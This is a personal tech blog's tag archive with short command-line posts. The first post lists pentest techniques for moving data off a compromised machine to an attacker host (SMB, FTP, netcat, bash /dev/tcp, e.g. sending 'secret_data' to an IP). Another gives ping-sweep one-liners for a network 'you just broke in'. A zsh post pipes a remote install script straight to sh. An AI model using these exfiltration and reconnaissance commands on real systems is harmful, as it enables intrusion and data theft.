Tag Archive for cli

Data exfiltration from the CLI

December 29, 2013 No comments

If you do pentesting or any kind of security analysis you probably found yourself in the situation of needing to transfer data between your machine and the vulnerable machine, it is useful to know a few ways to do this in case one of them doesn’t work for your specific situation.

- Generic
Samba can be configured on the attacker machine so that you can connect from the vulnerable
machine using the “net use” (windows) or “mount -t cifs” (linux) commands and then transfer files.

example:
net use z: \\192.168.1.20 /u:attacker

smb.conf http://www.samba.org/samba/docs/using_samba/ch06.html

FTP is another way we can do this, but remember that both the data and the login credentials travel in plain text, also since the client is interactive if you have a non-interactive shell you will need to script it.

example for the windows ftp client:
open ftp.domain.com
username
password
get file.txt
bye

run with ftp -s:script-name.txt

example for the linux ftp client:
http://www.stratigery.com/scripting.ftp.html

TFTP is a simpler version of ftp, it uses UDP and it doesn’t support authentication, a popular tftp server is Tftpd32, it’s still in use for things like backing up a router configuration or uploading the latest firmware.

SSH will allow us to transfer data in a safe manner, we can use the scp command to transfer files via ssh.

Netcat is also an option, it is usually available in most linux distributions, and there is also a
windows version, if you need encryption then you should try cryptcat or socat.

example:
echo data | nc 192.168.1.20 80

- Linux specific
On linux you can use /dev/tcp/<host>/<port> to open connections to other host (you need to use a recent version of Bash for this to work), then we can use netcat to capture this data on the other end.

example:
echo secret_data.txt > /dev/tcp/192.168.1.20/500

- Windows specific
In windows we can use powershell to open tcp connections, or download files from http.

example:

As you can see there are many ways for transferring files, so pick the one that suits you best and enjoy!

Networking, Security , , , , , ,

Mass renaming

March 30, 2012 One comment

Say you have a bunch of files that you want to rename, there is 2 easy approaches to this problem: you can use the aptly named ‘rename’ utility which should be available on most Linux or you can use a FOR loop, let’s see both.

Our job this time is to rename these images to have a lowercase extension.

We can achieve this with this command:

Problem solved, as you can see the syntax is similar to sed, basically we are saying “substitute .JPG for .jpg for all files in this directory”

Now using a for loop we are going to convert these extensions back to uppercase, just for practice.

There is also a slight variation:

Linux , ,

Beyond Bash

March 4, 2012 No comments

If you use Linux you are probably using the bash shell, but turns out there is life beyond bash!

When using aptitude or apt-get I’m sure you tried this at least once:

aptitude ins;
"Oops, that didn't work but I wish it did!"

Well that and much more is possible using another shell: ZSH, to get started you will want to install it (should be available in your distro repo) , after that just run ‘zsh’ you may get a dialog asking if you would like to create a basic configuration file (.zshrc just like .bashrc) just skip it but don’t get scared when your prompt looks like this:

[e]0;u@h: wa]${debian_chroot:+($debian_chroot)}u@h:w$

This is happening because it’s trying to use your bash prompt which uses a different syntax, now we are going to install “oh-my-zsh” which contains a decent default config, various plugins and it will set zsh as your default shell (you can revert using chsh -s /bin/bash user) also it comes with themes which are nothing more than prompt configurations, you can see images on how they look here:

https://github.com/robbyrussell/oh-my-zsh/wiki/themes

To install oh-my-zsh issue this command:

curl -L https://github.com/robbyrussell/oh-my-zsh/raw/master/tools/install.sh | sh

Now we are ready to start playing with our new shell, let’s explore some of the features.

- Better Tab completion

Zsh is able to autocomplete the arguments for most system commands, and even give us a menu-like interface if you tab twice.

This also works with the kill command:

- Typo correction

Zsh will help you to fix those annoying typos you make all the time:

- Auto pushd

If you jump a lot between different dirs you are going to love this, zsh can autopush the dirs you cd into, this means you will be able to list the recent dirs you have been in using the ‘d’ command (which is an alias for dirs -v) and then change to them just typing the corresponding number.

And that’s just a small taste of what zsh has to offer, now it’s your turn to try it and decide if you like it.

Zsh FAQ: http://zsh.sourceforge.net/FAQ/
Zsh documentation: http://zsh.sourceforge.net/Doc/

Linux , , , , , , ,

CLI ninja: Ping Sweep

February 20, 2012 No comments

Ever wanted to do a ping sweep in this new network you just broke in but you don’t want (or can’t, for some reason, AVs etc…) to upload any tools?

Well, you can still do it by leveraging the OS built-in tools, with a for loop we can launch a ping for a whole class C in about 3 min in windows and in about 10 sec in Linux, let’s start with Linux:

for i in {1..254} ;do (ping -c 1 192.168.1.$i | grep "bytes from" &) ;done

What this does is a for loop from 1 to 254, $i takes the value of the current iteration so in the first one it will be 1 then 2, 3… and so on, then we tell it to call the ping command with the -c option which means only ping once otherwise it would ping forever after that we pipe the output to grep so we only see the hosts that actually responded and the & at the end send it to the background so it will launch all the pings in parallel, if we only want the ip address and not the whole line we can further filter this using cut.

Now for windows…

for /L %i in (1,1,255) do @ping -n 1 -w 200 192.168.1.%i >;nul && echo 192.168.1.%i is up.

As you can see the idea is the same, -n being the equivalent of -c in Linux’s ping and -w is the timeout, then we send the output to nul and echo only if the ping command was successful (that’s what the && is for)

Linux, Security , , ,

The tree command

January 26, 2012 No comments

With the tree command in Linux you can get a tree representation of a directory structure, without any arguments it will start of the current dir and recursively go into each subdir to show a complete hierarchy.


# tree
.
├── 1
│   ├── 44
│   ├── aa
│   ├── bb
│   └── ff
└── 2
├── cc
└── dd

3 directories, 5 files

this is just some dirs and files I made for testing, but if you run this on a real dir you will get a lot of output, to solve this you can use the -L option to limit the depth


# tree -L 1
.
├── 1
└── 2

well that’s a bit better, you can also get other useful information like permissions using the -p option

# tree -p
.
├── [drw-r-----] 1
│   ├── [drwxr-xr-x] 44
│   ├── [-rw-r--r--] aa
│   ├── [-rw-r--r--] bb
│   └── [-rw-r--r--] ff
└── [drwxr-xr-x] 2
├── [-rw-r--r--] cc
└── [-rw-r--r--] dd

another useful one is -u to show the owners of the files,

# tree -u
.
├── [root ] 1
│   ├── [root ] 44
│   ├── [matu ] aa
│   ├── [matu ] bb
│   └── [matu ] ff
└── [root ] 2
├── [root ] cc
└── [root ] dd

Others that can also come in handy are -d to show only dirs and -s to show the size of files, but I will leave these to try on your own.

Linux , ,